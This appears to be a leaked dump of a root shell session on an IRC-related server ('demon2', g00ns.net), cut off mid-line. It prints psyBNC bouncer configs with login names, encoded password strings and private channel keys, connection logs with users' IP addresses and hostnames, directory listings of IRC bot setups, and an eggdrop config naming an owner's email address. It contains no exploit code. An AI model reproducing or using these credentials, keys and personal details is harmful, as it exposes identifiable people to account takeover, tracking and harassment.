-cat psybnc.gso.conf -head psybnc.gso.conf -psybnc psybnc.gso.conf -ls -./psybnc psybnc.gso.conf -ls -cd psybnc -ls -head psybnc.gso.con -head psybnc.gso.conf -psybnc psybnc.gso.conf -./psybnc psybnc.gso.conf -ls -cd psybnc -ls -head psybnc.gso.conf -psybnc psybnc.gso.conf -./psybnc psybnc.gso.conf -ps -aux -kill -9 17551 -ps -aux -./psybnc psybnc.gso.conf -ps -aux -ps -aux -who -last -ps -aux -head psybnc.gso.conf -cd psybnc -head psybnc.gso.conf -ls -head psybnc.conf -netstat | grep listen -netstat -kill -9 31328 -./psybnc psybnc.gso.conf -ls -cd psybnc -ls -cat psybnc.gso.conf -ls -cd psybnc/ -ls -cat psybnc.gso.conf -[root@demon2 bnc]# cd psybnc -[root@demon2 psybnc]# ls -CHANGES log psybnc psybnc.gso.conf.old targets.mak -config.h Makefile psybnc.1.conf psybnc.pid TODO -COPYING makefile.out psybnc.1.conf.old README tools -FAQ makesalt psybncchk salt.h -help menuconf psybnc.conf SCRIPTING -key motd psybnc.conf.old scripts -lang probe psybnc.gso.conf src -[root@demon2 psybnc]# cat psybnc.1.conf -PSYBNC.SYSTEM.PORT1=11474 -PSYBNC.SYSTEM.HOST1=72.20.26.209 -PSYBNC.HOSTALLOWS.ENTRY0=*;* -USER1.USER.LOGIN=admin -USER1.USER.USER=FiSh -USER1.USER.PASS==1h1K'Z`U`B'810'='T -USER1.USER.RIGHTS=1 -USER1.USER.VLINK=0 -USER1.USER.PPORT=0 -USER1.USER.PARENT=0 -USER1.USER.QUITTED=0 -USER1.USER.DCCENABLED=1 -USER1.USER.AUTOGETDCC=0 -USER1.USER.AIDLE=0 -USER1.USER.LEAVEQUIT=0 -USER1.USER.AUTOREJOIN=1 -USER1.USER.SYSMSG=1 -USER1.USER.LASTLOG=0 -USER1.USER.CERT=+ -USER1.USER.VHOST=g00ns.net -USER1.USER.LEAVEMSG=afk -USER1.USER.AWAYNICK=FiSh|bnc -USER1.USER.NICK=FiSh -USER1.SERVERS.SERVER1=S=irc.g00ns.net -USER1.SERVERS.PORT1=6601 -USER1.CHANNELS.ENTRY3=#13337 -USER1.CHANNELS.ENTRY6=#help -USER1.CHANNELS.ENTRY8=#notgay -USER1.CHANNELS.ENTRY1=#g00nspriv8 -USER1.CHANNELS.ENTRY4=#batcave -USER1.CHANNELS.KEY4=+1I271$28262u2A2U2U -USER1.CHANNELS.ENTRY7=#exploitercode -USER1.CHANNELS.ENTRY12=#s3x -USER1.CHANNELS.KEY12=+1W202824 -USER1.CHANNELS.ENTRY5=#g00ns -USER1.CHANNELS.ENTRY0=#illmob -USER1.CHANNELS.ENTRY2=#private -USER1.CHANNELS.KEY2=+1N2h262e2b2o2F2&2U3a2d2D2A -USER1.CHANNELS.ENTRY9=#exopers -USER1.CHANNELS.ENTRY10=#irclogs -USER1.CHANNELS.KEY1=+1G2i2c2j2j2p2@ -USER2.USER.LOGIN=sCuZz -USER2.USER.USER=sCuZz -USER2.USER.PASS=='R1n1b`W1B031K`=`O -USER2.USER.RIGHTS=0 -USER2.USER.VLINK=0 -USER2.USER.PPORT=0 -USER2.USER.PARENT=0 -USER2.USER.QUITTED=0 -USER2.USER.DCCENABLED=1 -USER2.USER.AUTOGETDCC=0 -USER2.USER.AIDLE=0 -USER2.USER.LEAVEQUIT=0 -USER2.USER.AUTOREJOIN=1 -USER2.USER.SYSMSG=1 -USER2.USER.LASTLOG=0 -USER2.USER.CERT=+ -USER2.USER.VHOST=g00ns.net -USER2.USER.NICK=sCuZz -USER2.SERVERS.SERVER1=irc.g00ns.net -USER2.SERVERS.PORT1=6667 -USER2.CHANNELS.ENTRY2=#private -USER2.CHANNELS.KEY2=+1N2h262e2b2o2F2&2U3a2d2D2A -USER2.CHANNELS.ENTRY1=#batcave -USER2.CHANNELS.KEY1=+1I271$28262u2A2U2U -USER2.CHANNELS.ENTRY0=#g00ns -USER3.USER.LOGIN=giovanni -USER3.USER.USER=katalyst -USER3.USER.PASS=='E13`h0v0V`H1u0A'f -USER3.USER.RIGHTS=0 -USER3.USER.VLINK=0 -USER3.USER.PPORT=0 -USER3.USER.PARENT=0 -USER3.USER.QUITTED=0 -USER3.USER.DCCENABLED=1 -USER3.USER.AUTOGETDCC=0 -USER3.USER.AIDLE=0 -USER3.USER.LEAVEQUIT=0 -USER3.USER.AUTOREJOIN=1 -USER3.USER.SYSMSG=1 -USER3.USER.LASTLOG=0 -USER3.USER.CERT=+ -USER3.USER.VHOST=g00ns.net -USER3.USER.NICK=giovanni -USER3.SERVERS.SERVER1=S=irc.g00ns.net -USER3.SERVERS.PORT1=6601 -USER3.CHANNELS.ENTRY3=#seminar -USER3.CHANNELS.ENTRY0=#g00ns -USER3.CHANNELS.ENTRY1=#illmob -USER3.CHANNELS.ENTRY4=#13337 -USER1.LGI.ENTRY1=FiSh;#private -USER1.LGI.ENTRY0=FiSh;#g00ns -USER4.USER.LOGIN=sick -USER4.USER.USER=sick -USER4.USER.PASS=='t'L0Q'F'q'b16'o`a -USER4.USER.RIGHTS=0 -USER4.USER.VLINK=0 -USER4.USER.PPORT=0 -USER4.USER.PARENT=0 -USER4.USER.QUITTED=0 -USER4.USER.DCCENABLED=1 -USER4.USER.AUTOGETDCC=0 -USER4.USER.AIDLE=0 -USER4.USER.LEAVEQUIT=0 -USER4.USER.AUTOREJOIN=1 -USER4.USER.SYSMSG=1 -USER4.USER.LASTLOG=0 -USER4.USER.CERT=+ -USER4.USER.VHOST=g00ns.net -USER4.USER.NICK=sick -USER4.SERVERS.SERVER1=addserver s=irc.g00ns.net -USER4.SERVERS.PORT2=6661 -USER4.SERVERS.SERVER2=addserver irc.g00ns.net -USER4.SERVERS.PORT3=6601 -USER4.SERVERS.SERVER3=addserver addserver S=irc.g00ns.net -USER4.SERVERS.PORT4=6601 -USER4.SERVERS.SERVER4=addserver S=irc.g00ns.net -USER4.SERVERS.PORT5=6601 -USER4.SERVERS.SERVER5=s=irc.g00ns.net -USER4.SERVERS.PORT6=6601 -USER4.SERVERS.SERVER6=s=irc.g00ns.net -USER4.SERVERS.PORT1=6601 -[root@demon2 psybnc]# cat psybnc.conf -PSYBNC.SYSTEM.PORT1=11473 -PSYBNC.SYSTEM.HOST1=72.20.26.209 -PSYBNC.HOSTALLOWS.ENTRY0=*;* -USER1.USER.LOGIN=admin -USER1.USER.USER=FiSh -USER1.USER.PASS==1h1K'Z`U`B'810'='T -USER1.USER.RIGHTS=1 -USER1.USER.VLINK=0 -USER1.USER.PPORT=0 -USER1.USER.PARENT=0 -USER1.USER.QUITTED=1 -USER1.USER.DCCENABLED=1 -USER1.USER.AUTOGETDCC=0 -USER1.USER.AIDLE=0 -USER1.USER.LEAVEQUIT=0 -USER1.USER.AUTOREJOIN=1 -USER1.USER.SYSMSG=1 -USER1.USER.LASTLOG=0 -USER1.USER.CERT=+ -USER1.USER.VHOST=72.20.26.209 -USER1.USER.NICK=_FiSh -USER2.USER.LOGIN=FiSh -USER2.USER.USER=FiSh -USER2.USER.PASS==0v0'01'T'q0='l`O'f -USER2.USER.RIGHTS=0 -USER2.USER.VLINK=0 -USER2.USER.PPORT=0 -USER2.USER.PARENT=0 -USER2.USER.QUITTED=0 -USER2.USER.DCCENABLED=1 -USER2.USER.AUTOGETDCC=0 -USER2.USER.AIDLE=0 -USER2.USER.LEAVEQUIT=0 -USER2.USER.AUTOREJOIN=1 -USER2.USER.SYSMSG=1 -USER2.USER.LASTLOG=0 -USER2.USER.CERT=+ -USER2.USER.NICK=FiSh -USER3.USER.LOGIN=pr0be -USER3.USER.USER=pr0be -USER3.USER.PASS==1G0$0u10`N`C0B`X'` -USER3.USER.RIGHTS=0 -USER3.USER.VLINK=0 -USER3.USER.PPORT=0 -USER3.USER.PARENT=0 -USER3.USER.QUITTED=0 -USER3.USER.DCCENABLED=1 -USER3.USER.AUTOGETDCC=0 -USER3.USER.AIDLE=0 -USER3.USER.LEAVEQUIT=0 -USER3.USER.AUTOREJOIN=1 -USER3.USER.SYSMSG=1 -USER3.USER.LASTLOG=0 -USER3.USER.CERT=+ -USER3.USER.VHOST=g00ns.net -USER3.USER.AWAY=|a|f|k -USER3.USER.NICK=pr0be -USER3.SERVERS.SERVER1=irc.g00ns.net -USER3.SERVERS.PORT2=6667 -USER3.SERVERS.SERVER2=irc.g00ns.net -USER3.SERVERS.PORT3=6601 -USER3.SERVERS.SERVER3=S=irc.g00ns.net -USER3.SERVERS.PORT1=6667 -USER1.SERVERS.SERVER1=S=irc.g00ns.net -USER1.SERVERS.PORT1=6601 -USER1.CHANNELS.ENTRY1=#g00ns -USER1.CHANNELS.ENTRY2=#13337 -USER1.CHANNELS.ENTRY3=#40z -USER1.CHANNELS.KEY3=+1H2i262j2c2s2R2Y -USER1.CHANNELS.ENTRY4=#private -USER1.CHANNELS.KEY4=+1H2i25202i2j2A2M2E3125 -USER1.CHANNELS.ENTRY5=#seminar -USER1.CHANNELS.ENTRY7=#help -USER4.USER.LOGIN=SyNiCaL -USER4.USER.USER=SyNiCaL -USER4.USER.PASS==0G'11d`h1G121n0G`' -USER4.USER.RIGHTS=0 -USER4.USER.VLINK=0 -USER4.USER.PPORT=0 -USER4.USER.PARENT=0 -USER4.USER.QUITTED=0 -USER4.USER.DCCENABLED=1 -USER4.USER.AUTOGETDCC=0 -USER4.USER.AIDLE=0 -USER4.USER.LEAVEQUIT=0 -USER4.USER.AUTOREJOIN=1 -USER4.USER.SYSMSG=1 -USER4.USER.LASTLOG=0 -USER4.USER.CERT=+ -USER4.USER.VHOST=g00ns.net -USER4.USER.NICK=SyNiCaL -USER3.CHANNELS.ENTRY2=#40z -USER3.CHANNELS.KEY2=+1H2i262j2c2s2R2Y -USER3.CHANNELS.ENTRY5=#wboard -USER3.CHANNELS.ENTRY7=#exploitercode -USER3.CHANNELS.ENTRY3=#vBTEAM -USER3.CHANNELS.ENTRY6=#BlackIRC -USER3.CHANNELS.ENTRY8=#slavehack -USER4.SERVERS.SERVER1=irc.g00ns.net -USER4.SERVERS.PORT1=6667 -USER4.CHANNELS.ENTRY3=#sizzurp -USER4.CHANNELS.ENTRY4=#13337 -[root@demon2 psybnc]# cat psybnc.gso.conf -PSYBNC.SYSTEM.PORT1=11475 -PSYBNC.SYSTEM.HOST1=72.20.26.209 -PSYBNC.HOSTALLOWS.ENTRY0=*;* -USER1.USER.LOGIN=admin -USER1.USER.USER=Genocide -USER1.USER.PASS==1h1K'Z`U`B'810'='T -USER1.USER.RIGHTS=1 -USER1.USER.VLINK=0 -USER1.USER.PPORT=0 -USER1.USER.PARENT=0 -USER1.USER.QUITTED=0 -USER1.USER.DCCENABLED=1 -USER1.USER.AUTOGETDCC=0 -USER1.USER.AIDLE=0 -USER1.USER.LEAVEQUIT=0 -USER1.USER.AUTOREJOIN=1 -USER1.USER.SYSMSG=1 -USER1.USER.LASTLOG=0 -USER1.USER.CERT=+ -USER1.USER.VHOST=72.20.26.209 -USER1.USER.LEAVEMSG=afk -USER1.USER.NICK=Genocide -USER1.SERVERS.PORT2=6667 -USER1.SERVERS.PORT1=7001 -USER1.SERVERS.SERVER1=S=irc.evilcoders.net -USER1.SERVERS.SERVER2=irc.g00ns.net -USER2.USER.LOGIN=sCuZz -USER2.USER.USER=sCuZz -USER2.USER.PASS=='q0N1q070I`I`O'W'y -USER2.USER.RIGHTS=0 -USER2.USER.VLINK=0 -USER2.USER.PPORT=0 -USER2.USER.PARENT=0 -USER2.USER.QUITTED=0 -USER2.USER.DCCENABLED=1 -USER2.USER.AUTOGETDCC=0 -USER2.USER.AIDLE=0 -USER2.USER.LEAVEQUIT=0 -USER2.USER.AUTOREJOIN=1 -USER2.USER.SYSMSG=1 -USER2.USER.LASTLOG=0 -USER2.USER.CERT=+ -USER2.USER.VHOST=g00ns.net -USER2.USER.NICK=sCuZz -USER1.CHANNELS.ENTRY1=#s3x -USER1.CHANNELS.KEY1=+1W202824 -USER1.CHANNELS.ENTRY3=#batcave -USER1.CHANNELS.KEY3=+1I271$28262u2A2U2U -USER1.CHANNELS.ENTRY7=#exopers -USER1.CHANNELS.ENTRY4=#notgay -USER1.CHANNELS.ENTRY9=#illmob -USER1.CHANNELS.KEY9=+1e2a1X2f2f2l1P2y2R -USER1.CHANNELS.ENTRY11=#t3st -USER1.CHANNELS.ENTRY10=#hightechhost -USER1.CHANNELS.ENTRY6=#420 -USER1.CHANNELS.ENTRY2=#spk -USER1.CHANNELS.ENTRY0=#g00ns -USER2.SERVERS.SERVER1=irc.partyvan.fm -USER2.SERVERS.PORT1=6667 -USER2.CHANNELS.ENTRY1=#420 -USER2.CHANNELS.ENTRY2=#private -USER2.CHANNELS.KEY2=+1S282026242B2U2Q2F362@3B -USER2.CHANNELS.ENTRY3=#batcave -USER2.CHANNELS.ENTRY0=#g00ns -[root@demon2 psybnc]# cd log -[root@demon2 log]# ls -INFO USER1.LOG.old USER2.LOG.old USER3.TRL USER4.TRL -psybnc.log USER1.TRL USER2.TRL USER4.LOG USER5.TRL -psybnc.log.old USER2.LOG USER3.LOG.old USER4.LOG.old USER6.TRL -[root@demon2 log]# cat psybnc.log -Sat Apr 19 15:06:18 :Listener created :72.20.26.209 port 11475 -Sat Apr 19 15:06:18 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :14297) -Sat Apr 19 15:06:18 :SSL initialized -Sat Apr 19 15:06:18 :Loading all Users.. -Sat Apr 19 15:06:23 :connect from 78.129.174.155 -Sat Apr 19 15:06:23 :User admin () trying irc.evilcoders.net port 7001 (72.20.26.209). -Sat Apr 19 15:06:23 :User admin () connected to S=irc.evilcoders.net:7001 (72.20.26.209) -Sat Apr 19 15:06:23 :User admin got disconnected from server. -Sat Apr 19 15:06:31 :User admin logged in. -Sat Apr 19 15:06:38 :User sCuZz () trying irc.partyvan.fm port 6667 (g00ns.net). -Sat Apr 19 15:06:38 :User sCuZz () connected to irc.partyvan.fm:6667 (g00ns.net) -Sat Apr 19 15:06:53 :User admin () trying irc.g00ns.net port 6667 (72.20.26.209). -Sat Apr 19 15:06:53 :User admin () connected to irc.g00ns.net:6667 (72.20.26.209) -Sat Apr 19 15:43:14 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net -Sat Apr 19 15:43:14 :User sCuZz logged in. -Sat Apr 19 18:09:32 :User sCuZz disconnected (from 71.105.242.232) -Sat Apr 19 20:31:32 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net -Sat Apr 19 20:31:32 :User sCuZz logged in. -Sat Apr 19 20:47:24 :User sCuZz disconnected (from 71.105.242.232) -Sun Apr 20 00:20:44 :User admin quitted (from 78.129.174.155) -Sun Apr 20 08:58:52 :connect from prometheus.aakretech.no -Sun Apr 20 08:59:25 :User admin logged in. -Sun Apr 20 11:27:16 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net -Sun Apr 20 11:27:16 :User sCuZz logged in. -Sun Apr 20 11:57:48 :User sCuZz disconnected (from 71.105.242.232) -Sun Apr 20 19:12:31 :User admin disconnected (from 69.60.116.169) -Sun Apr 20 21:42:46 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net -Sun Apr 20 21:42:46 :User sCuZz logged in. -Sun Apr 20 23:21:59 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net -Sun Apr 20 23:21:59 :User sCuZz logged in. -Sun Apr 20 23:24:04 :User sCuZz (sCuZz) disconnecting from stoned server. -Sun Apr 20 23:24:04 :User sCuZz got disconnected from server. -Sun Apr 20 23:24:15 :User sCuZz () trying p.60z.org port 6667 (g00ns.net). -Sun Apr 20 23:24:15 :User sCuZz () connected to p.60z.org:6667 (g00ns.net) -Sun Apr 20 23:24:29 :User sCuZz quitted (from 71.105.242.232) -Sun Apr 20 23:24:30 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net -Sun Apr 20 23:24:30 :User sCuZz logged in. -Sun Apr 20 23:25:11 :Hop requested by sCuZz. Quitting. -Sun Apr 20 23:25:11 :User sCuZz got disconnected from server. -Sun Apr 20 23:25:15 :User sCuZz () trying irc.partyvan.fm port 6667 (g00ns.net). -Sun Apr 20 23:25:15 :User sCuZz () connected to irc.partyvan.fm:6667 (g00ns.net) -Sun Apr 20 23:25:20 :User sCuZz quitted (from 71.105.242.232) -Sun Apr 20 23:25:21 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net -Sun Apr 20 23:25:21 :User sCuZz logged in. -Sun Apr 20 23:33:04 :User sCuZz quitted (from 71.105.242.232) -Sun Apr 20 23:41:01 :User sCuZz disconnected (from 71.105.242.232) -Mon Apr 21 10:40:13 :connect from prometheus.aakretech.no -Mon Apr 21 10:40:35 :User admin logged in. -[root@demon2 log]# cd ../.. -[root@demon2 bnc]# cd psybnc/probe/ -[root@demon2 probe]# ls -al -total 324 -drwxrwxr-x 3 bnc bnc 4096 Sep 23 2007 . -drwxr-xr-x 12 bnc bnc 4096 Apr 20 23:41 .. -drwxr-xr-x 11 bnc bnc 4096 Nov 15 18:37 psybnc --rw-rw-r-- 1 bnc bnc 312177 Aug 19 2005 psyBNC-2.3.2-7.tar.gz -[root@demon2 probe]# cd psybnc -[root@demon2 psybnc]# ls -CHANGES help Makefile motd psybnc.conf.old SCRIPTING TODO -config.h key makefile.out psybnc psybnc.pid scripts tools -COPYING lang makesalt psybncchk README src -FAQ log menuconf psybnc.conf salt.h targets.mak -[root@demon2 psybnc]# cat psybnc.conf -PSYBNC.SYSTEM.PORT1=31337 -PSYBNC.SYSTEM.ME=probe -PSYBNC.SYSTEM.HOST1=* -PSYBNC.HOSTALLOWS.ENTRY0=*;* -USER1.USER.NICK=pr0be`bnc -USER1.USER.USER=pr0be -USER1.USER.PASS==0a'6`c0x1C0P'n`N0@`p1I0M1a0F1916 -USER1.USER.VHOST=g00ns.net -USER1.USER.RIGHTS=1 -USER1.USER.VLINK=0 -USER1.USER.AWAY=afk -USER1.USER.AWAYNICK=pr0be`bnc -USER1.USER.LOGIN=pr0be -USER1.SERVERS.SERVER1=irc.g00ns.net -USER1.SERVERS.PORT1=6667 -USER1.CHANNELS.ENTRY1=#private -USER1.CHANNELS.KEY1=+1L1S2'2o2j2m2i2V353a2k2e2s -USER1.CHANNELS.ENTRY3=#exploitercode -USER1.CHANNELS.ENTRY5=#13337 -USER1.CHANNELS.ENTRY6=#seminar -USER1.CHANNELS.ENTRY7=#BlackIRC -USER1.CHANNELS.ENTRY8=#Help -USER1.CHANNELS.ENTRY9=#batcave -USER1.CHANNELS.KEY9=+1G1I1T2i2e2s2d2M35 -USER1.CHANNELS.ENTRY10=#20z -USER1.CHANNELS.ENTRY11=#HACK-RADIO -USER1.CHANNELS.ENTRY12=#officiallyretarded -USER1.CHANNELS.ENTRY13=#qrash -USER1.CHANNELS.ENTRY14=#seminar-private -USER1.CHANNELS.ENTRY15=#g00ns-radio -USER1.CHANNELS.ENTRY4=#illmob -USER1.CHANNELS.ENTRY2=#g00ns -USER1.CHANNELS.ENTRY16=#irclogs -USER1.CHANNELS.ENTRY0=#exopers -USER2.USER.LOGIN=probe -USER2.USER.USER=probe -USER2.USER.PASS==1L'S`v`50A1l'b0y17 -USER2.USER.RIGHTS=0 -USER2.USER.VLINK=0 -USER2.USER.PPORT=0 -USER2.USER.PARENT=0 -USER2.USER.QUITTED=0 -USER2.USER.DCCENABLED=1 -USER2.USER.AUTOGETDCC=0 -USER2.USER.AIDLE=0 -USER2.USER.LEAVEQUIT=0 -USER2.USER.AUTOREJOIN=1 -USER2.USER.SYSMSG=1 -USER2.USER.LASTLOG=0 -USER2.USER.CERT=+ -USER2.USER.NICK=probe -[root@demon2 psybnc]# cd log -[root@demon2 log]# ls -INFO psybnc.log USER1.LOG USER1.TRL USER2.TRL -[root@demon2 log]# head psybnc.log -Sun Sep 23 21:11:08 :Listener created :0.0.0.0 port 31337 -Sun Sep 23 21:11:08 :Can't create listening sock on host * port 31337 (bind) -Sun Sep 23 21:11:08 :SSL initialized -Sun Sep 23 21:11:08 :Loading all Users.. -Sun Sep 23 21:11:08 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :9672) -Sun Sep 23 21:11:13 :User pr0be () has no server added -Sun Sep 23 21:12:43 :User pr0be () has no server added -Sun Sep 23 21:14:13 :User pr0be () has no server added -Sun Sep 23 21:14:15 :connect from fl-71-3-132-100.dhcp.embarqhsd.net -Sun Sep 23 21:14:18 :User pr0be logged in. -[root@demon2 log]# cd /home -[root@demon2 home]# cd egg -[root@demon2 egg]# ls -al -total 1076 -drwx--x--x 10 egg egg 4096 Mar 23 11:26 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. --rw------- 1 egg egg 6532 Apr 14 23:11 .bash_history --rw-r--r-- 1 egg egg 24 Aug 9 2007 .bash_logout --rw-r--r-- 1 egg egg 176 Aug 9 2007 .bash_profile --rw-r--r-- 1 egg egg 124 Aug 9 2007 .bashrc -drwx--x--x 3 egg egg 4096 Aug 9 2007 domains -drwxrwxr-x 3 egg egg 4096 Apr 14 23:10 efnet -drwx------ 11 egg egg 4096 Apr 21 14:00 eggdrop -drwxr-xr-x 10 egg egg 4096 Aug 13 2007 eggdrop1.6.18 --rw-rw-r-- 1 egg egg 1025608 Aug 13 2007 eggdrop1.6.18.tar.gz -drwx------ 2 egg egg 4096 Aug 21 2007 .elinks -drwxrwx--- 3 egg mail 4096 Aug 9 2007 imap -drwx------ 2 egg egg 4096 Aug 9 2007 mail -lrwxrwxrwx 1 egg egg 35 Aug 9 2007 public_html -> ./domains/egg.g00ns.net/public_html --rw-r----- 1 egg mail 34 Aug 9 2007 .shadow -drwx------ 2 egg egg 4096 Aug 12 2007 .ssh -[root@demon2 egg]# ls -al efnet/ -total 1508 -drwxrwxr-x 3 egg egg 4096 Apr 14 23:10 . -drwx--x--x 10 egg egg 4096 Mar 23 11:26 .. -drwx------ 2 egg egg 4096 Mar 23 11:30 ... --rwx------ 1 egg egg 1497940 Mar 23 12:35 fight --rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.bloo --rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.etho --rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.hacker --rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.hthbot --rw-r--r-- 1 egg egg 5 Mar 23 11:51 .pid.hthbot. --rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.logic --rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.notgay -[root@demon2 egg]# ls -al eggdrop -total 1260 -drwx------ 11 egg egg 4096 Apr 21 14:00 . -drwx--x--x 10 egg egg 4096 Mar 23 11:26 .. --rwxrw-r-- 1 egg egg 2277 Mar 23 00:31 boneless.botchk --rw------- 1 egg egg 1264 Apr 21 14:00 boneless.chan --rw------- 1 egg egg 1264 Apr 21 00:00 boneless.chan~bak --rw-r--r-- 1 egg egg 52983 Mar 23 11:36 boneless.conf --rw------- 1 egg egg 1183 Apr 21 14:00 boneless.user --rw------- 1 egg egg 1183 Apr 21 00:00 boneless.user~bak -drwxrwxr-x 5 egg egg 4096 Aug 13 2007 doc -lrwxrwxrwx 1 egg egg 14 Aug 13 2007 eggdrop -> eggdrop-1.6.18 --rwxr-xr-x 1 egg egg 888159 Aug 13 2007 eggdrop-1.6.18 -drwxrwxr-x 3 egg egg 4096 Aug 13 2007 filesys -drwxrwxr-x 4 egg egg 4096 Aug 13 2007 help --rwxrw-r-- 1 egg egg 2272 Mar 23 00:31 keebler.botchk --rw------- 1 egg egg 1263 Apr 21 14:00 keebler.chan --rw------- 1 egg egg 1263 Apr 21 00:00 keebler.chan~bak --rw-r--r-- 1 egg egg 52956 Mar 23 11:32 keebler.conf --rw------- 1 egg egg 1305 Apr 21 14:00 keebler.user --rw------- 1 egg egg 1305 Apr 21 00:00 keebler.user~bak -drwxrwxr-x 2 egg egg 4096 Aug 13 2007 language -drwxrwxr-x 2 egg egg 4096 Apr 21 03:05 logs -lrwxrwxrwx 1 egg egg 14 Aug 13 2007 modules -> modules-1.6.18 -drwxrwxr-x 2 egg egg 4096 Aug 13 2007 modules-1.6.18 -drwx------ 3 egg egg 4096 Aug 19 2007 netbots --rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.boneless --rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.keebler --rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.sentry --rw-rw-r-- 1 egg egg 6 Apr 14 23:09 pid.V0LTR0N --rw-r--r-- 1 egg egg 25077 Aug 13 2007 README -drwxrwxr-x 2 egg egg 4096 Mar 23 00:31 scripts --rwxrw-r-- 1 egg egg 2267 Mar 23 00:31 sentry.botchk --rw------- 1 egg egg 1257 Apr 21 13:59 sentry.chan --rw------- 1 egg egg 1257 Apr 21 00:00 sentry.chan~bak --rw-r--r-- 1 egg egg 52950 Mar 23 00:03 sentry.conf --rw------- 1 egg egg 1327 Apr 21 13:59 sentry.user --rw------- 1 egg egg 1327 Apr 21 00:00 sentry.user~bak -drwxrwxr-x 2 egg egg 4096 Aug 13 2007 text --rw------- 1 egg egg 1415 Apr 21 14:00 v0ltr0n.chan --rw------- 1 egg egg 1415 Apr 21 00:00 v0ltr0n.chan~bak --rw-r--r-- 1 egg egg 52890 Apr 14 23:09 v0ltr0n.conf --rw------- 1 egg egg 0 Apr 21 14:00 v0ltr0n.notes --rw------- 1 egg egg 1273 Apr 21 14:00 v0ltr0n.user --rw------- 1 egg egg 1273 Apr 21 00:00 v0ltr0n.user~bak -[root@demon2 egg]# grep -v "^#" eggdrop/v0ltr0n.conf | grep -v ^$ -set username "v0ltr0n" -set admin "Altaaf <email: navprod@yahoo.com>" -set network "60z.org" -set timezone "EST" -set offset "5" -set my-hostname "g00ns.net" -set my-ip "72.20.26.209" -set max-logs 5 -set max-logsize 0 -set quick-logs 0 -set raw-log 0 -logfile mco * "logs/eggdrop.log" -logfile jpk #lamest "logs/lamest.log" -set log-time 1 -set keep-all-logs 0 -set logfile-suffix ".%d%b%Y" -set switch-logfiles-at 300 -set quiet-save 1 -set console "mkcobxs" -set userfile "v0ltr0n.user" -set sort-users 0 -set help-path "help/" -set text-path "text/" -set temp-path "/tmp" -set motd "text/motd" -set telnet-banner "text/banner" -set userfile-perm 0600 -set botnet-nick "V0LTR0N" -listen 11800 bots -listen 11801 users -set remote-boots 2 -set share-unlinks 1 -set protect-telnet 0 -set dcc-sanitycheck 0 -set ident-timeout 5 -set require-p 0 -set open-telnets 0 -set stealth-telnets 0 -set use-telnet-banner 0 -set connect-timeout 15 -set dcc-flood-thr 3 -set telnet-flood 5:60 -set paranoid-telnet-flood 1 -set resolve-timeout 15 -set reserved-portrange 11820:11830 -set ignore-time 15 -set hourly-updates 00 -set owner "Altaaf" -set notify-newusers "$owner" -set default-flags "hp" -set whois-fields "url birthday" -set die-on-sighup 0 -set die-on-sigterm 1 -unbind dcc n tcl *dcc:tcl -unbind dcc n set *dcc:set -set must-be-owner 1 -unbind dcc n simul *dcc:simul -set max-dcc 50 -set allow-dk-cmds 1 -set dupwait-timeout 5 -set mod-path "modules/" -loadmodule dns -loadmodule channels -set chanfile "v0ltr0n.chan" -set force-expire 0 -set share-greet 0 -set use-info 1 -set global-flood-chan 10:60 -set global-flood-deop 3:10 -set global-flood-kick 3:10 -set global-flood-join 5:60 -set global-flood-ctcp 3:60 -set global-flood-nick 5:60 -set global-aop-delay 5:30 -set global-idle-kick 0 -set global-chanmode "nt" -set global-stopnethack-mode 0 -set global-revenge-mode 0 -set global-ban-time 120 -set global-exempt-time 60 -set global-invite-time 60 -set global-chanset { - -autoop +autovoice - -bitch +cycle - +dontkickops +dynamicbans - +dynamicexempts +dynamicinvites - -enforcebans +greet - -inactive -nodesynch - -protectfriends +protectops - -revenge -revengebot - -secret -seen - +shared +statuslog - +userbans +userexempts - +userinvites -protecthalfops - -autohalfop -} -loadmodule server -set net-type 5 -set nick "v0ltr0n" -set altnick "v0ltr0n?" -set realname "v0ltr0n" -bind evnt - init-server evnt:init_server -proc evnt:init_server {type} { - global botnick - putquick "MODE $botnick +i-wsx" -} -set default-port 6667 -set servers { -p.60z.org:6667 -} -set keep-nick 1 -set strict-host 0 -set quiet-reject 1 -set lowercase-ctcp 0 -set answer-ctcp 3 -set flood-msg 5:60 -set flood-ctcp 3:60 -set never-give-up 1 -set server-cycle-wait 60 -set server-timeout 60 -set servlimit 0 -set check-stoned 1 -set serverror-quit 1 -set max-queue-msg 300 -set trigger-on-ignore 0 -set exclusive-binds 0 -set double-mode 1 -set double-server 1 -set double-help 1 -set optimize-kicks 1 -set stack-limit 4 -loadmodule ctcp -set ctcp-mode 0 -loadmodule irc -set bounce-bans 1 -set bounce-exempts 0 -set bounce-invites 0 -set bounce-modes 0 -set max-bans 100 -set max-exempts 20 -set max-invites 20 -set max-modes 100 -set kick-fun 0 -set ban-fun 0 -set learn-users 0 -set wait-split 600 -set wait-info 180 -set mode-buf-length 200 -unbind msg - ident *msg:ident -unbind msg - addhost *msg:addhost -set opchars "@" -set no-chanrec-info 0 -set prevent-mixing 1 -loadmodule transfer -set max-dloads 3 -set dcc-block 0 -set copy-to-tmp 1 -set xfer-timeout 30 -loadmodule share -loadmodule compress -set share-compressed 1 -loadmodule filesys -set files-path "/home/protect/eggdrop/filesys" -set incoming-path "/home/protect/eggdrop/filesys/incoming" -set upload-to-pwd 0 -set filedb-path "" -set max-file-users 20 -set max-filesize 1024 -loadmodule notes -set notefile "v0ltr0n.notes" -set max-notes 50 -set note-life 60 -set allow-fwd 0 -set notify-users 1 -set notify-onjoin 1 -loadmodule console -set console-autosave 1 -set force-channel 0 -set info-party 0 -loadmodule seen -loadmodule blowfish -loadmodule uptime -source scripts/alltools.tcl -source 